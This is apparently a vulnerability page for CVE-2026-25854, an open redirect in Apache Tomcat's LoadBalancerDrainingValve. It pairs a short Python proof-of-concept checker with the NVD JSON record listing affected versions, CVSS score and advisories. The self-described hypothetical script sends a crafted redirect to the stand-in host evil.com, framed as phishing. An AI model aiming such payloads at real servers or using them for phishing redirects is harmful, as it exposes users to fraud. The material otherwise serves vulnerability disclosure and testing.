CVE-2026-25854

#!/usr/bin/env python3 import requests def check_open_redirect(target_host): # Hypothetical exploit URL structure based on vulnerable valve behavior # Attackers craft a URL that includes an external domain payload = "http://evil.com/phishing" attack_url = f"{target_host}/?redirect={payload}" try: response = requests.get(attack_url, allow_redirects=False, timeout=5) if response.status_code == 302: location = response.headers.get('Location') if location and "evil.com" in location: print(f"[+] Vulnerability Confirmed! Redirecting to: {location}") return True print("[-] Vulnerability not detected.") return False except Exception as e: print(f"Error: {e}") if __name__ == "__main__": check_open_redirect("http://localhost:8080")

{"cve": {"id": "CVE-2026-25854", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:24.207", "lastModified": "2026-04-14T14:01:07.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Occasional URL redirection to untrusted Site ('Open Redirect') vulnerability in Apache Tomcat via the LoadBalancerDrainingValve.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M1 through 10.1.52, from 9.0.0.M23 through 9.0.115, from 8.5.30 through 8.5.100.\nOther, unsupported versions may also be affected\n\nUsers are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.1", "versionEndExcluding": "9.0.116", "matchCriteriaId": "5585CA5A-76EA-43E1-BB66-BE1D80BDE1E9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.53", "matchCriteriaId": "D0914AD3-D9E6-470C-A858-64D0CFA3F733"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.20", "matchCriteriaId": "1F39B82B-0E67-459D-8065-2C6EE7970D0D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:9.0.0:milestone23:*:*:*:*:*:*", "matchCriteriaId": "D7D8F2F4-AFE2-47EA-A3FD-79B54324DE02"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:9.0.0:milestone24:*:*:*:*:*:*", "matchCriteriaId": "1B4FBF97-DE16-4E5E-BE19-471E01818D40"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:9.0.0:milestone25:*:*:*:*:*:*", "matchCriteriaId": "3B266B1E-24B5-47EE-A421-E0E3CC0C7471"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:9.0.0:milestone26:*:*:*:*:*:*", "matchCriteriaId": "29614C3A-6FB3-41C7-B56E-9CC3F45B04F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:9.0.0:milestone27:*:*:*:*:*:*", "matchCriteriaId": "C6AB156C-8FF6-4727-AF75-590D0DCB3F9D"}]}]}], "references": [{"url": "https://lists.apache.org/thread/ghct3b6o74bp2vm7q875s1zh0dqrz3h0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/09/21", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}